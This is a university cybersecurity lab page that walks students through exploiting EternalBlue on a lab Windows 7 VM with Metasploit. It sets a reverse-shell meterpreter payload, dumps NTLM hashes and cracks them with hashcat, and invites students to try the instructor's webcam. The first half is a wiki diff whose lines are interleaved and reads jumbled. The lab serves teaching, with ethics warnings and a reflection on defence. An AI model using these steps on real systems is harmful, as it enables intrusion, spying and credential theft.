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In this lab, we will learn how to use the EternalBlue vulnerability on an unpatched Windows 7 host. This exploit was linked to the NSA but has since been patched on all windows versions. We will use Metasploit on Kali Linux to make this process a little easier.
[[File:metasploit.png|right|thumb|x700px|alt=Kali Running Metasploit|Kali Running Metasploit]]
In this lab, we will learn how to use the EternalBlue vulnerability on an unpatched Windows 7 host. This exploit was linked to the NSA but has since been patched on all Windows versions. We will use Metasploit on Kali Linux to make this process a little easier. We will also use Metasploit to dump some password hashes, which can sometimes be cracked to reveal the original password.
'''This is for educational purposes only. Attacking computers or equipment without permission is unethical and is against the law. The simple rule to keep you within the lines in the Cyberworld is to ask yourself; do you own it and is it in use? You should only practice your cyber skills on devices/networks that you own, or have written permission to exploit, and devices/networks that are not in use'''
== starting up metasploit ==
'''I also want to emphasise that, in this space, there are large rewards in terms of high paying jobs for doing things right and massive jail sentences for those that don't operate properly in the world. Decrypting packets and/or accessing someone’s network without their consent is illegal. The purpose of this lab is not to encourage students to break into vulnerable networks but to show the techniques that malicious hackers would use.'''
'''At the end of this activity, we will reflect on what we could do to prevent these sorts of attacks or at least limit the damage. We will also reflect on the ethics of vulnerability disclosure in the digital world.'''
== Setup ==
Log in using the outreach username and password.
Start the lab by opening VMware and opening the Windows 7 image and the Kali Linux image.
You can log into kali with:
username: kali
password: kali
[[File:metasploit_options.png|right|thumb|x400px|alt=Metasploit options|Metasploit options]]
== Exploiting Windows 7 with EternalBlue ==
=== Starting up Metasploit ===
On the Kali VM we are going to open the terminal and type the following commands:
on the Kali VM we are going to open terminal and type the following commands:
service postgresql start
service postgresql start
Line 14: Line 31:
we are then going to use the search command to see what Modules are available:
'''hint:''' the password is student
We are then going to use the following exploit on our machine:
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
you should see something like this:
Once selected we need to fill out some options for this to work:
Your output should look like the Metasploit Options image to the right:
We will set these options in the sections below.
=== Getting the IP address of your Windows 7 Machine ===
You will need to open the Windows command prompt and type:
Matching Modules
We are looking for an IP address that looks like this 134.115.148.xxx (xxx being the last numbers)
In this example you can see the ip address is
'''If you get a 169.x.x.x address then you will need to go into the Virtual Machine network settings and set it to: Custom LAN Red. This will be demonstrated by your tutor'''
[[File:Win7-ip.PNG|center|thumb|x400px|alt=Identifying the Windows 7 IP|Identifying the Windows 7 IP]]
[[File:Kali-terminal.PNG|right|thumb|x400px|alt=Kali set rhost|Kali set rhost]]
=== Setting the target to attack in Metasploit===
In Kali Linux, we now need to set the host to attack (the Windows 7 machine)
  Name                                          Disclosure Date  Rank    Check  Description
  ----                                          ---------------  ----    -----  -----------
set rhosts 134.115.148.xxx
  auxiliary/admin/smb/ms17_010_command          2017-03-14      normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
  auxiliary/scanner/smb/smb_ms17_010                              normal  Yes    MS17-010 SMB RCE Detection
  exploit/windows/smb/ms17_010_eternalblue      2017-03-14      average  No    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14      average  No    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
  exploit/windows/smb/ms17_010_psexec            2017-03-14      normal  No    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
== Some Basic Bash Programming ==
This will be the IP address you got earlier.
This section will introduce you to looping in bash. Open a new text editor window and paste in the following code.
We will now set the payload which will infect the Windows 7 machine. This software will allow us to control the machine remotely
set payload windows/x64/meterpreter/reverse_tcp
for i in {1..5}
We now need to tell Metasploit the IP address of our Kali Linux machine.
  echo "Hello World!"
=== Getting the IP address in Kali Linux===
  sleep 1s
Open a new terminal window and type this command to get the IP address:
We are looking for an IP address that looks like this 134.115.148.xxx (xxx being the last numbers)
In this example, you can see the IP address is
[[File:Kali-ip.PNG|center|thumb|x400px|alt=Kali IP|Kali IP]]
=== Setting the local IP in Metasploit ===
in the terminal window on the kali machine type:
set lhost 134.115.148.xxx
then set the port:
set lport 4321
=== Running EternalBlue and controlling the Windows 7 machine ===
We are now going to run this exploit and can test out things like watching the screen or turning the webcam on remotely.
In the Kali terminal, run the exploit:
You should get this output:
[[File:Running_eternal_blue.png|center|thumb|x400px|alt=Running the EternalBlue attack|Running the EternalBlue attack]]
We now have control of the machine and you can try out some commands such as:
This will tell us about the type of Windows machine that is running
This will open a browser window where we can see what is on screen. Hit Ctrl+C to close this down.
Let's try creating a directory on Windows:
mkdir C:/Users/Murdoch/Desktop/1337-hacker
Now look on your Windows 7 Desktop. Can you see the directory that we just created?
To see all the possible options, issue a:
'''hint:''' to close a current command press control-c
=== Advanced: Turning on a remote Webcam on the Instructor's PC ===
How would you remotely turn on someone's webcam?
The instructor of the class may have a webcam installed. Can you turn on the instructor's webcam? You may need help with this.
== Pivoting with Password Hashes ==
Many real-world hacks feature many pivot points. The infamous LinkedIn compromise was an example of this. A LinkedIn developer had put some LinkedIn credentials on a home machine. The compromise began when a soft target, a developers home machine, was compromised. The attackers then pivoted from there. In this next example, we will show you what this sort of a pivot can look like.
Again, if you are employed to protect a company network, it is very unlikely that they will be running unpatched Windows 7 machines. If they are doing this, you have a real problem on your hands. So there is little chance that this sort of machine would be seen on a large company network, but these will still exist at home, and that can be an attackers pivot point.
Let's extract the password hashes from the windows machine with
Find the username LinkedIn. We think that this user may be reusing passwords between their home and work computers. If we can crack their home password, then maybe we can use the same password on a work machine. A password hash is a bit different from encryption. When we use encryption see use a key to hide the message. Hash functions are supposed to be one way, but they are still vulnerable to brute force attacks.
[[File:hash_dump.PNG|center|thumb|x400px|alt=Using metasploit to dump the NTLM hashes|Using metasploit to dump the NTLM hashes]]
We know that Windows 7 would hash passwords using an algorithm called NTLM.
Now lets manually extract the password hash
Save this as a text file called linkedin_hash
Now we are going to crack it with hashcat, but before we do, I want us to download a password list. I have provided one for you here. Open up a new terminal and can get it with:
wget https://csn.murdoch.edu.au/words_alpha.txt
Now before you move on, issue an:
You should see two files ''linkedin_hash'' and ''words_alpha.txt''. If you do not then ask for help.
We are now going to see if we can crack the linked in password hash with some software called hashcat.
hashcat -m 1000 -a 0 -o cracked_passwords.txt linkedin_hash words_alpha.txt --show
Now issue another:
We should see a new file called ''cracked_passwords.txt''. Open this with:
cat cracked_passwords.txt
== Reflection ==
In this activity, we targeted an insecure Windows 7 machine. We exploited it with an NSA exploit that was stolen by a hacking group called the Shadow Brokers. We then dumped the password hashes and cracked the actual passwords with the idea of pivoting into other devices, accounts or networks. Chat with your partner in class about what could be done to prevent this attack. Think about things that we could do to limit the damage.
Is it ethical for Nation State actors, as in governments, to find Zero day exploits and then not disclose them? Why do you think a government might find exploits in products and then hold onto them? Create an argument both for and against this dilemma.
If you have time have a read about:
== Extra Time? ==
If you still have time, hackers like to leave a sign or a message.
Create some ascii art here: https://patorjk.com/software/taag/#p=display&f=Graffiti&t=Type%20Something%20
Put it in a text file and upload it to the windows machine. If you use the:
In Metasploit, you will see that there is an upload feature:
upload alias C:/Users/Murdoch/Desktop/
[[File:alias.PNG|center|thumb|x400px|alt=Upload your alias|Upload your alias]]

Latest revision as of 01:52, 13 April 2022

Kali Running Metasploit
Kali Running Metasploit

In this lab, we will learn how to use the EternalBlue vulnerability on an unpatched Windows 7 host. This exploit was linked to the NSA but has since been patched on all Windows versions. We will use Metasploit on Kali Linux to make this process a little easier. We will also use Metasploit to dump some password hashes, which can sometimes be cracked to reveal the original password.

This is for educational purposes only. Attacking computers or equipment without permission is unethical and is against the law. The simple rule to keep you within the lines in the Cyberworld is to ask yourself; do you own it and is it in use? You should only practice your cyber skills on devices/networks that you own, or have written permission to exploit, and devices/networks that are not in use

I also want to emphasise that, in this space, there are large rewards in terms of high paying jobs for doing things right and massive jail sentences for those that don't operate properly in the world. Decrypting packets and/or accessing someone’s network without their consent is illegal. The purpose of this lab is not to encourage students to break into vulnerable networks but to show the techniques that malicious hackers would use.

At the end of this activity, we will reflect on what we could do to prevent these sorts of attacks or at least limit the damage. We will also reflect on the ethics of vulnerability disclosure in the digital world.


Log in using the outreach username and password.

Start the lab by opening VMware and opening the Windows 7 image and the Kali Linux image.

You can log into kali with:

username: kali
password: kali
Metasploit options
Metasploit options

Exploiting Windows 7 with EternalBlue

Starting up Metasploit

On the Kali VM we are going to open the terminal and type the following commands:

service postgresql start

hint: the password is student

We are then going to use the following exploit on our machine:

use exploit/windows/smb/ms17_010_eternalblue

Once selected we need to fill out some options for this to work:


Your output should look like the Metasploit Options image to the right:

We will set these options in the sections below.

Getting the IP address of your Windows 7 Machine

You will need to open the Windows command prompt and type:


We are looking for an IP address that looks like this 134.115.148.xxx (xxx being the last numbers)

In this example you can see the ip address is

If you get a 169.x.x.x address then you will need to go into the Virtual Machine network settings and set it to: Custom LAN Red. This will be demonstrated by your tutor

Identifying the Windows 7 IP
Identifying the Windows 7 IP
Kali set rhost
Kali set rhost

Setting the target to attack in Metasploit

In Kali Linux, we now need to set the host to attack (the Windows 7 machine)

set rhosts 134.115.148.xxx

This will be the IP address you got earlier.

We will now set the payload which will infect the Windows 7 machine. This software will allow us to control the machine remotely

set payload windows/x64/meterpreter/reverse_tcp

We now need to tell Metasploit the IP address of our Kali Linux machine.

Getting the IP address in Kali Linux

Open a new terminal window and type this command to get the IP address:


We are looking for an IP address that looks like this 134.115.148.xxx (xxx being the last numbers)

In this example, you can see the IP address is

Kali IP
Kali IP

Setting the local IP in Metasploit

in the terminal window on the kali machine type:

set lhost 134.115.148.xxx

then set the port:

set lport 4321

Running EternalBlue and controlling the Windows 7 machine

We are now going to run this exploit and can test out things like watching the screen or turning the webcam on remotely.

In the Kali terminal, run the exploit:


You should get this output:

Running the EternalBlue attack
Running the EternalBlue attack

We now have control of the machine and you can try out some commands such as:


This will tell us about the type of Windows machine that is running



This will open a browser window where we can see what is on screen. Hit Ctrl+C to close this down.

Let's try creating a directory on Windows:

mkdir C:/Users/Murdoch/Desktop/1337-hacker

Now look on your Windows 7 Desktop. Can you see the directory that we just created?

To see all the possible options, issue a:


hint: to close a current command press control-c

Advanced: Turning on a remote Webcam on the Instructor's PC

How would you remotely turn on someone's webcam?

The instructor of the class may have a webcam installed. Can you turn on the instructor's webcam? You may need help with this.

Pivoting with Password Hashes

Many real-world hacks feature many pivot points. The infamous LinkedIn compromise was an example of this. A LinkedIn developer had put some LinkedIn credentials on a home machine. The compromise began when a soft target, a developers home machine, was compromised. The attackers then pivoted from there. In this next example, we will show you what this sort of a pivot can look like.

Again, if you are employed to protect a company network, it is very unlikely that they will be running unpatched Windows 7 machines. If they are doing this, you have a real problem on your hands. So there is little chance that this sort of machine would be seen on a large company network, but these will still exist at home, and that can be an attackers pivot point.

Let's extract the password hashes from the windows machine with


Find the username LinkedIn. We think that this user may be reusing passwords between their home and work computers. If we can crack their home password, then maybe we can use the same password on a work machine. A password hash is a bit different from encryption. When we use encryption see use a key to hide the message. Hash functions are supposed to be one way, but they are still vulnerable to brute force attacks.

Using metasploit to dump the NTLM hashes
Using metasploit to dump the NTLM hashes

We know that Windows 7 would hash passwords using an algorithm called NTLM.

Now lets manually extract the password hash


Save this as a text file called linkedin_hash

Now we are going to crack it with hashcat, but before we do, I want us to download a password list. I have provided one for you here. Open up a new terminal and can get it with:

wget https://csn.murdoch.edu.au/words_alpha.txt

Now before you move on, issue an:


You should see two files linkedin_hash and words_alpha.txt. If you do not then ask for help.

We are now going to see if we can crack the linked in password hash with some software called hashcat.

hashcat -m 1000 -a 0 -o cracked_passwords.txt linkedin_hash words_alpha.txt --show

Now issue another:


We should see a new file called cracked_passwords.txt. Open this with:

cat cracked_passwords.txt


In this activity, we targeted an insecure Windows 7 machine. We exploited it with an NSA exploit that was stolen by a hacking group called the Shadow Brokers. We then dumped the password hashes and cracked the actual passwords with the idea of pivoting into other devices, accounts or networks. Chat with your partner in class about what could be done to prevent this attack. Think about things that we could do to limit the damage.

Is it ethical for Nation State actors, as in governments, to find Zero day exploits and then not disclose them? Why do you think a government might find exploits in products and then hold onto them? Create an argument both for and against this dilemma.

If you have time have a read about:


Extra Time?

If you still have time, hackers like to leave a sign or a message.

Create some ascii art here: https://patorjk.com/software/taag/#p=display&f=Graffiti&t=Type%20Something%20

Put it in a text file and upload it to the windows machine. If you use the:


In Metasploit, you will see that there is an upload feature:

upload alias C:/Users/Murdoch/Desktop/
Upload your alias
Upload your alias